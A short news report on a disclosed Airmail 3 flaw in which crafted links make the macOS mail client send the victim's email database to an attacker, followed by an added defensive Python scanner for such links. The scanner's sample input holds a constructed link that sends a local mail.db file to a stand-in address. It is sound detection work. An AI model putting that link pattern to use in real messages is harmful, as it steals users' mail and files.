A dangerous vulnerability in Airmail 3, an alternative email client for macOS, allows a remote attacker to steal users' emails and attachments.
Researchers from VerSprite found that the way Airmail 3 processes URL requests can be used to steal files from the victim. An attacker can send an Airmail 3 user an email containing a link with a URL request that triggers the application's “send mail” function, which sends a new email from the victim's account. The link can also include elements that make Airmail 3 attach files to the outgoing message, e.g. previously sent emails.
The researchers were also able to bypass Airmail's HTML filters so that the exploit starts immediately. If the victim clicks on the malicious message to view it in Airmail 3, the exploit runs, and the database containing the victim's email is automatically sent to the attacker.
According to the experts, four different vulnerabilities can be used to implement this attack scenario.
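A defender-side check for the pattern described above, as an added example that is not part of the original article: it scans an HTML message body for links that use a custom (non-web) URL scheme, request a send-type action and reference local files. The scheme name `examplemail`, the action names and the parameter hints are assumptions, since the article does not give the real ones used by Airmail 3.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

WEB_SCHEMES = {"http", "https", "mailto"}
# Assumed values: the article does not list the real actions or parameters.
SEND_ACTIONS = {"send", "compose"}
FILE_PARAM_HINTS = ("attach", "file", "path")


class LinkCollector(HTMLParser):
    """Collects every href/src value found in an HTML message body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value)


def audit_link(url):
    """Return the findings for one URL; an empty list means nothing flagged."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if not scheme or scheme in WEB_SCHEMES:
        return []
    findings = ["custom-scheme"]
    # In scheme://action?query the action is parsed as the netloc.
    action = (parts.netloc or parts.path.strip("/")).lower()
    if action in SEND_ACTIONS:
        findings.append("send-action")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        names_file = any(hint in key.lower() for hint in FILE_PARAM_HINTS)
        if names_file or value.startswith(("/", "~", "file:")):
            findings.append("file-reference:" + key)
    return findings


def audit_message(html_body):
    """Map each flagged link in the message body to its findings."""
    collector = LinkCollector()
    collector.feed(html_body)
    return {u: f for u in collector.links if (f := audit_link(u))}


# Constructed sample message; the scheme and parameter names are hypothetical.
SAMPLE = ('<p>Invoice attached</p><a href="https://example.test/doc">doc</a>'
          '<a href="examplemail://send?to=collector@example.test&amp;'
          'attachment=/Users/user/Library/mail.db">view</a>')

if __name__ == "__main__":
    print(audit_message(SAMPLE))
```

A mail gateway or client-side filter can quarantine any message whose links return both `send-action` and a `file-reference` finding, since a legitimate message has little reason to ask the recipient's mail client to send local files.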